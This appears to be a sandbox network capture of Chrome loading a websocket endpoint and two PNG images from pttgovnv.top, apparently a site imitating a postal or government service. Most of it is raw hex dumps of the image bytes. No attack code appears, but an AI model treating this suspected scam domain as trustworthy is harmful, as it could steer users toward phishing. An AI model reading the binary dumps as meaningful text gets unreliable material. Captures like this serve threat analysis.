          2024-09-01 22:25:26 UTC549OUTGET /socket.io/?EIO=4&transport=websocket&sid=-SnapXukcxVrNsxsBQUE HTTP/1.1
          Host: pttgovnv.top
          Connection: Upgrade
          Pragma: no-cache
          Cache-Control: no-cache
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Upgrade: websocket
          Origin: https://pttgovnv.top
          Sec-WebSocket-Version: 13
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          Sec-WebSocket-Key: SaAybtNMRKOjzf7exhpFJw==
          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
          2024-09-01 22:25:27 UTC603INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u2X%2FS2dwvtWTepwRL%2FEs3kznKVktdzZKo%2B3CRcLJtgtbb9Bw9tr3I6HGNB9D1Cx10XQ3n4NNE9ZcL42VXb9EIU77zWJtOrNHrsdkpsVztnqezXzZU38wawzUKDHqmU0%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad1e8f104239-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:27 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
          Data Ascii: 22{"code":3,"message":"Bad request"}
          2024-09-01 22:25:27 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          91192.168.2.449835172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:26 UTC599OUTGET /help/layout/images/49.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC726INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: image/png
          Content-Length: 10988
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"2aec-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36235
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h3VWZVzAzrDgM1ZM%2Bnx44Ear4Ore5Rouw3OQ2sDMnkf0eHmIutmT9VZIAGdBpBfabN1%2F0W%2FrVb504IIuXsDb%2Fqxd4KuPKJb9KrCaXbArQP1apl3avo0BUZ6uFJFNKPA%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad1ede957c7c-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:26 UTC643INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 2a 79 49 44 41 54 78 da ec dd 4f 52 db e8 1a 2f 60 f5 ad 3b 27 3b 80 33 e8 31 9c 15 e0 ac 20 ee 71 aa 1a 67 05 a1 57 80 59 41 c8 0a 62 ba 2a e3 43 56 80 59 41 93 71 06 c7 ac e0 86 15 e4 ea 6d 3e 4e bb 69 4b 96 6c c9 96 ec e7 a9 72 25 85 8d 2c 7d 92 d1 cf df df 9f 7e fc f8 91 01 00 d0 2f ff 47 11 00 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<*yIDATxOR/`;';31 qgWYAb*CVYAqm>NiKlr%,}~/GqqqBBB qqq
          2024-09-01 22:25:26 UTC1369INData Raw: 70 90 b3 3c 17 00 20 c4 f5 90 75 56 01 00 21 ae 87 62 9d d5 a1 62 00 00 84 b8 1d 11 35 74 fa cd 01 00 42 5c ff c4 9a ab 57 9a 5b 01 00 21 ae 7f a2 b9 55 bf 39 00 40 88 13 e4 00 00 21 0e 41 0e 00 10 e2 10 e4 00 00 21 4e 90 03 00 84 38 04 39 00 40 88 43 90 03 00 84 b8 bd 0e 72 47 8a 02 00 84 38 fa 17 e4 6e f2 20 f7 4a 51 00 80 10 47 bf 1c 67 4f 35 72 82 1c 00 08 71 08 72 00 80 10 87 20 07 00 08 71 08 72 00 80 10 27 c8 01 00 42 1c 9d 09 72 13 c5 00 00 42 1c fd a3 26 0e 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 00 21 6e 7f 99 0c 18 00 84 38 fa e9 24 0f 72 93 8e 06 cc 91 d3 03 00 42 1c c5 ce ba 16 e4 d2 fe 08 71 00 20 c4 51 21 c8 8d 3b 14 e0 ce 9c 12 00 10 e2 a8 e6 62 db 4d 98 f9 fb 9f 0b 70 00 20 c4 51 df a7 6d 05 b9 f4 be 1f 9c
          Data Ascii: p< uV!bb5tB\W[!U9@!A!N89@CrG8n JQGgO5rqr qr'BrB&888!!!!n8$rBq Q!;bMp Qm
          2024-09-01 22:25:26 UTC1369INData Raw: 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 41 2d df 15 01 00 08 71 f4 cb d7 fc 31 52 0c 00 20 c4 d1 af 00 37 f8 76 7b a9 26 0e 00 2a fa bf 8a 00 01 0e e0 c9 db b7 bf 8e b2 7f b6 0a 4c 3e 7f fe 7d a2 74 d6 2e db 93 fc 9f ab 17 3f be cf cb f6 5c e9 08 71 f4 cf 5d fe 18 0a 70 40 87 1c e5 8f d3 17 3f 9b 2a 96 46 bc 5a 50 b6 08 71 f4 d0 75 1e de 46 8a 01 00 56 a3 4f 1c 02 1c 00 08 71 20 c0 01 c0 26 68 4e 45 80 03 f8 cb b4 e2 cf a8 6f 96 3f 2e 17 fc 0c 21 8e 8e fb 98 07 38 23 90 80 4e fb fc f9 f7 a9 d0 d6 5a d9 46 60 1b 2b 09 21 8e 7e 79 97 07 b8 49 5b 1b ff f9 f5 c5 a8 cd ed c3 36 bc 7d fb eb 20 7b 1a 29 79 b4 e0 e9 b8 19 ce 52 e0 e8 fa 71 c4 88 c4 93 f4 78 b5 e0 25 f7 e9 58 ee 9d 75 10 e2 d8 af 00 17 df ea e2 66 27 c4 3d dd 30 7f b4
          Data Ascii: B A-q1R 7v{&*L>}t.?\q]p@?*FZPquFVOq &hNEo?.!8#NZF`+!~yI[6} {)yRqx%Xuf'=0
          2024-09-01 22:25:26 UTC1369INData Raw: 24 e0 c7 72 40 e7 0d 1d f6 55 fa 72 f2 32 bc c6 94 23 37 2b 34 71 95 85 aa 55 9b cb 66 25 cf 9d 6c 29 60 af da cd 61 ba 27 81 ad e8 5c 2d fc 79 9a f8 77 e5 73 91 5f a7 55 3f 0f 47 15 3f c7 65 a3 53 b7 f5 a5 4e 88 83 06 82 dc 4d 0a 6a 45 37 d8 f8 f9 9b fc 35 51 63 37 49 81 ee fe 45 80 2b 1b c8 c0 f6 94 d5 a4 1e 66 eb 4d fc 5b e7 8f 7e dc 3c 8a 46 a2 ae 3a 90 61 a1 d8 4e 1a 85 f7 72 4e b7 36 a6 be 58 f5 c6 37 5b f1 9c b5 a6 8d fe 5b d1 7c be e3 4b 3a 1d 94 fc 7c 53 c1 f6 ac e4 b3 55 d5 43 9b cb d4 f1 17 cd a9 b4 65 94 15 f7 6d 99 ff c3 14 73 43 45 73 eb 7d d4 e0 45 73 6b 85 81 0c 2f 43 a3 3f 16 fb a7 ec 26 33 6a ba 6f 5e aa 21 5c d4 a4 75 de 72 9f b3 aa fb 37 db 93 f3 ae b3 7c 3f 9c 2b 02 21 8e 1e 8b 66 d5 ac 5e 0d c5 f3 22 de ff 2f 7b 6a 86 31 90 81 d2 6f
          Data Ascii: $r@Ur2#7+4qUf%l)`a'\-yws_U?G?eSNMjE75Qc7IE+fM[~<F:aNrN6X7[[|K:|SUCemsCEs}Esk/C?&3jo^!\ur7|?+!f^"/{j1o
          2024-09-01 22:25:26 UTC1369INData Raw: f5 f1 98 35 db bf ac f1 cf c1 92 c1 3a 5d f9 22 17 d7 51 51 7f 48 83 1c 84 38 76 51 0c 3a c8 ba 33 5c 3e 6e 20 31 7f 5d 8c 6e bd 72 76 56 0a 30 47 5d bb d9 54 08 47 95 fb 9c 55 74 b5 ea 4d 3c dd 08 7f 69 38 04 bc 4b 03 2f ca de f7 bc 62 e8 aa 1b 3c 9a dc 66 94 c9 a0 c9 66 c0 ec a9 43 fe a0 c9 a6 be b4 ad 41 56 be 14 dc 2a 06 4d 9f a3 16 94 85 e1 89 bf 92 42 1c bb 15 e0 e2 8f fc 59 47 76 e7 31 7d 8b fc 2d 7f fc eb db ed a5 39 8e 56 bc 81 e5 8f 68 16 bb cc 3a 54 2b 97 c2 d1 6f 25 2f 79 df d4 40 87 92 29 47 aa fe 7e d4 62 45 19 ae 3b 97 62 84 e9 d7 cb 02 dc 8b d0 f5 4b 93 e1 a3 c1 6d 46 78 39 6a 38 c0 c5 36 4f 1a de e6 f3 71 df a7 73 78 dd f0 67 ab f1 73 d4 c2 17 b9 8f 25 5f 96 0c 72 68 99 3e 71 6c 2a c0 9d 64 2d ac 67 59 53 dc 24 e3 e6 7e b3 e7 fd e1 8a c2
          Data Ascii: 5:]"QQH8vQ:3\>n 1]nrvV0G]TGUtM<i8K/b<ffCAV*MBYGv1}-9Vh:T+o%/y@)G~bE;bKmFx9j86Oqsxgs%_rh>ql*d-gYS$~
          2024-09-01 22:25:26 UTC1369INData Raw: 8a f6 71 e1 39 cc 5f 1f e7 7b 59 cd fe a8 ee 3c 78 e9 bc 8e 97 bc ac f4 33 04 42 1c 2c 0f 84 37 79 40 8b 01 0e 07 cb c2 5e fe ba 93 86 03 64 13 37 b2 59 7e c3 88 ff 9e 2e 78 fa 34 26 3e 5d 75 22 d6 74 43 3c 2d ba b1 15 04 ca 71 ba 59 1f 74 a4 88 5e 95 1c c3 3a af 5d 37 78 37 59 4e a7 1b 2a cb a3 ba ef 95 c2 db 55 d6 d0 3c 8f 2d ec e3 49 85 d7 0f b3 e2 d1 ec 59 c9 e7 63 d9 76 3b f7 a5 90 fe d0 9c 0a f5 fe 98 c6 cd f6 a6 a3 fb 5f 76 83 59 a7 06 a9 e8 77 ef 5e 06 c3 fc 66 1d af fd 6f ba 59 1f b8 a4 0a 43 4d 94 d3 fd 3e 94 53 aa d9 9c 6d 30 c0 b5 65 b4 c2 ef 0c 5d ed 08 71 d0 9d 10 17 8e d3 88 d6 4e c9 03 55 84 cb 87 06 6f 40 cf 37 e0 e3 2a a1 31 7f ed 24 fb fb 52 66 2c 2e d3 e7 72 da 97 90 7b b3 23 c7 7a 9c 6a 4f ab 9e e7 61 e6 8b 0c 42 1c 6c cc 7d 8d d7 be
          Data Ascii: q9_{Y<x3B,7y@^d7Y~.x4&>]u"tC<-qYt^:]7x7YN*U<-IYcv;_vYw^foYCM>Sm0e]qNUo@7*1$Rf,.r{#zjOaBl}
          2024-09-01 22:25:26 UTC1369INData Raw: 6a 26 fc ba ac 56 2a 8d 7e bd 2b 78 fa 74 dd d5 08 b6 a8 28 74 8d 97 2c ec be 6a 39 4d 7c 12 37 fe 45 6b 15 0b 9b 54 33 4d a9 6c 89 81 0d d0 ce 14 05 c7 d1 cf ee db ed 65 67 be 89 a7 ce d9 71 63 39 ab 11 fa aa 96 df 6d c1 73 17 a9 53 7a 84 94 fb 96 9a 2a db ba 59 bf 59 f0 f3 18 c4 f1 47 7e 4c bf 65 8b 57 b0 58 b5 9c ce d2 14 2f 7d 2b a7 a5 1a 9a 90 77 54 76 dd 6e 70 39 ae a2 51 aa 55 03 1f 08 71 d0 94 54 0b 77 d6 d2 e6 07 1d fc 43 3e ae 78 bc 8f a9 1f 5d 95 70 38 2d 18 b9 f7 ec 34 3d b2 3a 6b 47 e6 db fd 69 8b 81 77 92 6a 11 8b 56 af f8 10 8f fc 35 d1 cf 70 b6 64 5b 83 b9 72 ba 2e 29 ff de 95 53 45 b7 2d 6f ff cb 86 bf 08 5d 57 f8 0c 69 4a 65 23 34 a7 76 8f 0f fe 66 b5 39 97 59 e7 e6 85 5a d2 ac 37 6f 52 73 d3 a3 ec 69 4d cb 5d 32 aa f0 9a c3 b9 f0 55 f4
          Data Ascii: j&V*~+xt(t,j9M|7EkT3Mlegqc9msSz*YYG~LeWX/}+wTvnp9QUqTwC>x]p8-4=:kGiwjV5pd[r.)SE-o]WiJe#4vf9YZ7oRsiM]2U
          2024-09-01 22:25:26 UTC1369INData Raw: 67 4a 43 88 6b 43 7e 73 8f 7d 3f 2e 78 fa 6b 1e e0 46 3d 38 8c f8 8c cc 4a 9e 8f 1a ab a8 69 3b 5d 12 88 fa f6 a5 69 58 23 7c aa 85 03 21 8e 2d 18 0b 71 9d 76 97 d6 bc ed 63 80 3b 2f b9 b6 62 74 f4 a0 2f 21 ba 4a 73 6f 6a 32 bd 29 08 73 d1 3c 79 d4 b3 11 92 7f 36 a9 56 ec ab 28 c4 c1 8e d0 9c da 23 a9 6f dc 47 25 d1 e9 90 dd c7 00 17 01 ed 43 c1 d3 31 72 73 58 32 6a b3 97 d2 f1 94 85 99 a3 8e 1f c2 c3 82 9f 8d 2a 9c 6b 4d a9 20 c4 b1 e5 a0 f0 a8 18 3a 27 6a e1 a6 3d 0c 70 d1 bc 58 36 10 e3 7c c7 46 a2 be 0c 72 5f 7b ba fb 8b ce 59 95 1a b6 61 41 50 bf f3 11 06 21 8e 96 a5 a5 b8 ce 95 44 27 c3 75 df 02 5c 34 29 4e b2 e2 9a 99 cb 3d 18 c8 d0 57 8b 42 5c 95 51 aa c3 8a db 02 84 38 5a 0a 72 13 df 9c 3b a5 97 b5 70 29 c0 15 0d 64 b8 ae bb 12 41 0f 43 ec 51 c9
          Data Ascii: gJCkC~s}?.xkF=8Ji;]iX#|!-qvc;/bt/!Jsoj2)s<y6V(#oG%C1rsX2j*kM :'j=pX6|Fr_{YaAP!D'u\4)N=WB\Q8Zr;p)dACQ
          2024-09-01 22:25:26 UTC762INData Raw: 96 e8 fa 57 f6 54 1b 55 27 c4 3c 64 7f 2d f3 35 6e e1 b0 ca ae df 2f 4d d7 74 a5 26 f8 a3 ec 69 be c1 87 9a 9f b7 28 bb d7 f9 36 d4 c0 c1 8a 0c 6c d8 df 20 37 fd f9 f5 45 d4 9c c4 8d e4 fd 9e 17 47 04 8e d1 0e f6 7f 7b bd c6 cd 39 9a 4d 67 25 2f f9 5e f2 bb d3 2c 8d e4 4c b5 3c 47 e9 b1 68 1b 11 18 ef 57 b8 89 47 88 5a 34 0a b2 6e 6d 4e 5c ff 37 75 8f 71 2e 04 8e d2 71 9e a4 63 2c 1a 8d 1b e5 31 5b 61 79 af 49 b6 78 54 ec ac 28 80 e7 fb 52 74 de 8b de fb be e0 5a f9 5e f1 5a 79 1e f1 3b 4e cd d0 f1 18 94 bc d7 4c ad 1b 34 e3 a7 1f 3f 7e 28 85 3d 97 c2 5c 7c a3 3e ad 12 0c 52 93 6c d1 b6 e2 8f f9 45 4f 0e 3d 6a 03 c6 69 b9 32 00 e8 15 cd a9 44 ad dc 7d 8c c4 cc ff fb 4b b6 3f 4d ac 7f f6 c3 11 e0 00 e8 2b cd a9 cc 87 b9 3f e7 76 fa f9 f5 c5 28 7b 6a 1e 39
          Data Ascii: WTU'<d-5n/Mt&i(6l 7EG{9Mg%/^,L<GhWGZ4nmN\7uq.qc,1[ayIxT(RtZ^Zy;NL4?~(=\|>RlEO=ji2D}K?M+?v({j9


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          92192.168.2.449836104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:27 UTC361OUTGET /help/layout/images/45.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:27 UTC726INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:27 GMT
          Content-Type: image/png
          Content-Length: 33304
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"8218-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36236
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zi8P%2BR9oNdetPvS8Wl6a57kHo8ckAXcmYRkF2TPuZ0pLQAO7ao5NailzDL%2FRZnU%2Blk9wbFYalDYwx9k2Oqixnor5XdLZXDipEzOZCGVlfBbc66to%2FsmrAvU8t0kLJoI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad21cea14319-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:27 UTC643INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 81 a5 49 44 41 54 78 da ec 9d 0b 78 14 f5 bd f7 ff b9 ec 6e ee 09 21 24 dc 42 42 10 b9 08 12 2c a2 5c 94 20 1e db aa 55 5a 6b ad ad 3d a2 f6 9c 62 df b7 42 6d 6b 8f ed 6b c5 fa 9e 72 6a 5b c5 f6 7d d4 f6 b4 15 ce e9 cd 5a 2d 55 8b d6 23 12 14 10 28 ca b5 02 02 21 04 42 08 84 b0 b9 67 b3 b9 bc f3 9d ec 2c b3 bb b3 3b 33 bb b3 9b dd cd f7 f3 3c 03 9b dd d9 dd d9 99 ff cc ff 3b bf 6b ca c0 c0 80 20 84 10 42 08 21 89 45 2a 77 01 21 84 10 42 08 45 1c 21 84 10 42 08 a1 88 23 84 10 42 08
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<IDATxxn!$BB,\ UZk=bBmkkrj[}Z-U#(!Bg,;3<;k B!E*w!BE!B#B
          2024-09-01 22:25:27 UTC1369INData Raw: 11 47 08 21 84 10 42 11 47 08 21 84 10 42 28 e2 08 21 84 10 42 08 45 1c 21 84 10 42 08 45 1c 21 84 10 42 08 a1 88 23 84 10 42 08 21 14 71 84 10 42 08 21 84 22 8e 10 42 08 21 84 22 8e 10 42 08 21 84 50 c4 11 42 08 21 84 10 8a 38 42 08 21 84 10 8a 38 42 08 21 84 10 42 11 47 08 21 84 10 42 28 e2 08 21 84 10 42 28 e2 08 21 84 10 42 08 45 1c 21 84 10 42 08 89 9c 74 ee 02 42 48 32 d0 5c 3a b9 5c fa af dc c0 aa b5 85 27 8f d4 72 8f 11 42 12 9d 94 81 81 01 ee 05 42 48 3c 8a b2 2a cf c3 4a 69 29 f0 2c 95 9e e7 f0 78 96 85 5f b7 57 5a 9c 9e c7 7b 3c 8f 9d 9e c7 42 12 7d d5 3c 22 84 10 8a 38 42 08 b9 28 d4 ca c5 a0 f5 ac ca f3 7f b9 47 a8 e5 47 f2 b9 3d b3 32 44 cf 25 79 c2 7e b4 55 d8 f7 76 5b b5 b9 2d 1e 51 57 eb 59 20 ec 68 d5 23 84 50 c4 11 42 86 85 60 ab f2 88
          Data Ascii: G!BG!B(!BE!BE!B#B!qB!"B!"B!PB!8B!8B!BG!B(!B(!BE!BtBH2\:\'rBBH<*Ji),x_WZ{<B}<"8B(GG=2D%y~Uv[-QWY h#PB`
          2024-09-01 22:25:27 UTC1369INData Raw: 22 5c 71 24 e2 d2 9b 5a 4d ad 8f a4 06 93 e4 4b e2 78 b3 24 74 cf a5 b6 f5 8e 44 79 94 3c 03 6f c2 b1 e9 2e 1f 23 06 6c e9 a9 67 1e 5a 50 3b f6 df de 3d 21 7c e3 15 f1 78 93 74 6c 4f 78 c4 dc 5a 8e 74 42 86 07 a9 dc 05 84 0c 0f f1 26 2d b5 d2 c3 e7 45 60 f0 fc 3a f7 a5 19 4d a9 2d 83 16 9e cc c3 75 46 3f 76 91 67 79 14 4b 8a bb af c2 cc 36 d9 cf b7 c4 d5 3e b2 9f 35 27 e2 7a 47 3a 4c 7f 47 e6 47 27 f3 60 a9 0c 55 df ce 9f ce eb 8b c4 80 c3 26 3f 96 c4 75 79 fd 9a 25 38 8e b3 c5 60 59 14 35 38 ae cf e3 38 7b c4 3a 21 84 22 8e 10 92 c0 e2 ad 4a 5a aa 35 c4 5b 8b 47 04 4c ec bc a9 30 df b1 b3 b3 48 79 21 b7 fa 54 58 df e5 1e 93 6b 6a 7d 24 37 c4 95 88 33 9b d4 50 9c 67 fa 3b c2 d9 b7 6d b3 02 bc d3 77 4b 42 ae b2 f0 e4 11 08 b5 89 9e e3 d8 a2 21 e6 aa 3d 6e
          Data Ascii: "\q$ZMKx$tDy<o.#lgZP;=!|xtlOxZtB&-E`:M-uF?vgyK6>5'zG:LGG'`U&?uy%8`Y588{:!"JZ5[GL0Hy!TXkj}$73Pg;mwKB!=n
          2024-09-01 22:25:27 UTC1369INData Raw: 99 d4 90 f7 b7 e3 a6 3f bb 63 76 85 a9 f5 8d ba 51 b5 80 1b d5 27 d6 31 35 75 41 fd 9a 25 70 db df 23 7c 33 58 9f 62 d2 03 21 14 71 84 10 7d 01 07 f7 55 b5 b4 a8 fb 99 22 58 a9 2a ed 82 fb 9f d4 eb 62 f2 36 e3 e6 54 40 f2 01 7a 72 9a c1 4c 3f 55 25 b9 c1 0c 43 d5 b9 21 5a 49 0d e1 f4 49 c5 67 bb 4d 5a 31 23 75 a3 6a b0 a6 f0 e4 91 b5 18 6f 9e 71 a7 80 f1 c8 1e ac 84 50 c4 11 42 82 08 b8 65 1e 01 a7 2e dc 8b 00 f3 aa d6 3b c6 e4 d8 f6 76 fb f8 41 23 71 ab ea f4 e4 d4 c4 4c 3f 55 24 37 98 61 a8 3a 37 98 4d 6a e8 2d b2 1b 5a 2f eb 43 f3 bd 67 db e6 97 9a 5a df 2a 37 aa 1f b3 50 38 d8 53 24 ba 4a f8 b6 ee 9a e5 11 72 cb 78 b6 12 42 11 47 08 b9 28 e0 56 49 ff 3d 2f 2e 26 29 40 d5 dc e3 69 99 e5 b4 37 b4 ad d5 7a 1f 26 f1 ac 7d e6 db 63 21 78 de 6c 9f 53 33 fd
          Data Ascii: ?cvQ'15uA%p#|3Xb!q}U"X*b6T@zrL?U%C!ZIIgMZ1#ujoqPBe.;vA#qL?U$7a:7Mj-Z/CgZ*7P8S$JrxBG(VI=/.&)@i7z&}c!xlS3
          2024-09-01 22:25:27 UTC1369INData Raw: f5 e3 14 eb 1c 04 b0 9e 80 03 b1 76 a3 86 2b e0 e4 1b 8e 96 fe 14 fb 9e ee 34 b8 94 2f 7c 69 b2 18 f9 b3 c3 78 9a ae 55 42 a2 08 13 1b 08 89 a2 80 eb 2b 4b 17 ce 7b ca c4 b9 7b 16 88 b6 b9 d3 c6 4a 02 6e 81 d9 cf 82 35 cd 6c c3 7a f9 e4 36 59 04 38 da fd 54 87 2b 10 d1 10 54 b0 5a 36 df 3f 59 3e 96 46 92 49 62 9d 8d 1a 89 80 f3 fe 56 49 c0 35 7d ed 0a d1 3d 69 bc ec 46 f7 f0 3c 93 1d 08 a1 88 23 24 a1 04 1c 1e f7 8e b6 8b 82 e7 4f 18 2a 90 1b f2 33 6f bc dc 74 f1 5c 59 08 98 c8 56 45 82 83 e9 02 bd ef b7 f3 80 9b 00 fb 18 b1 8a 7a 6e ee 58 67 a3 5a 29 e0 94 ef ee a8 2a 3a a9 7a 99 42 8e 10 8a 38 42 e2 5e c0 2d 15 ea 18 b8 f4 14 b9 6e 46 e1 b3 47 22 12 72 8a 5b 35 1c cc f4 56 6d bf d9 98 6b 14 ee 40 58 95 ce 3c bc 70 d8 1f f3 09 73 ef 11 53 3e f1 98 18 37
          Data Ascii: v+4/|ixUB+K{{Jn5lz6Y8T+TZ6?Y>FIbVI5}=iF<#$O*3ot\YVEznXgZ)*:zB8B^-nFG"r[5Vmk@X<psS>7
          2024-09-01 22:25:27 UTC1369INData Raw: a1 04 4c b7 b3 4e 53 70 f9 ec a7 b2 79 9a 16 b0 de ae c8 e3 e3 f1 7b f0 bb 8c 09 c1 a9 9a ef d7 73 0b e3 f7 58 21 e6 20 e0 1b 56 2d 36 24 a8 86 58 c0 81 aa 80 f1 3e 78 be a8 6b c8 ad f5 9c 57 84 10 8a 38 42 a2 26 e0 0a 3c 02 ce 27 13 d5 7f bd b4 8e 9e 8f 99 fd ec 70 84 5c b8 6e 55 4c ca bd 61 c4 bd 79 df df db 2d 9a 6b 36 c9 25 35 60 bd 3a fb d1 46 9f d7 61 95 d3 a2 78 fa 4d 41 3f b3 a7 5d db 15 09 8b 1e 44 cf f4 5b 7e 22 5b f5 02 8e 49 cd db 41 c5 13 b2 5c 8d 02 c1 69 34 a6 0d d9 a8 fe a8 dd c9 fe 74 34 1d 0d 10 73 a1 f6 85 55 c4 81 80 03 65 fb 5f 5a 5e 19 44 dc 29 7e 7d 25 63 95 89 0e 84 50 c4 11 12 35 fc 13 19 34 cb 24 a4 5d 70 97 87 f3 e1 e1 08 39 b3 6e 55 ac 8b d8 aa 70 6b d5 29 9c 3d f4 96 24 5c 76 8b 3e 8d ec 4d 58 e5 b4 6a a6 41 bc c0 f5 aa 85 bb
          Data Ascii: LNSpy{sX! V-6$X>xkW8B&<'p\nULay-k6%5`:FaxMA?]D[~"[IA\i4t4sUe_Z^D)~}%cP54$]p9nUpk)=$\v>MXjA
          2024-09-01 22:25:27 UTC1369INData Raw: 01 b5 f7 7c c6 42 d9 3c 53 c9 1c a1 84 5c 24 02 2e 5c eb 5b 28 d2 ea 7a 53 c4 80 b4 5f 97 8c 12 9e 73 6d 15 2f 45 84 68 93 ce 5d 40 48 20 8a 1b b5 e7 ca 2c d1 7c cb 2c d1 97 9b 95 99 22 44 69 24 9f 09 21 27 c4 6e 91 fd 5a 73 44 42 ae f9 7e 11 71 8d 37 7f 10 ff 55 b6 f0 01 1f cb 10 1e 8f 9b fb cf 72 12 80 bf a5 09 b1 6e a3 67 7d 36 c0 92 84 58 b7 a6 9a ad 01 eb 43 e8 f8 77 5f d0 22 98 45 cb bf 37 2a 84 18 dc 8c 19 85 e3 65 17 2c 2c 78 3d 9d 4e 9f 0c 51 c4 ef ed 7f 69 79 c0 ef d4 02 db ec 15 6b d9 23 25 b1 56 e4 f3 1e 7c 56 76 90 56 5b fe 85 7c 83 91 37 2e f4 ef 87 d0 3d b5 eb b7 ba 59 ae 10 70 70 1d 63 ff a3 bd 99 d1 f2 25 8a 90 2b fa d9 07 5e c1 15 89 80 83 f5 ad 70 dd 21 cb c4 9b b2 3d c8 b2 86 25 39 e7 ef 5e 17 32 dc aa eb 0b 4f 1e a9 e6 95 89 10 8a 38
          Data Ascii: |B<S\$.\[(zS_sm/Eh]@H ,|,"Di$!'nZsDB~q7Urng}6XCw_"E7*e,,x=NQiyk#%V|VvV[|7.=Yppc%+^p!=%9^2O8
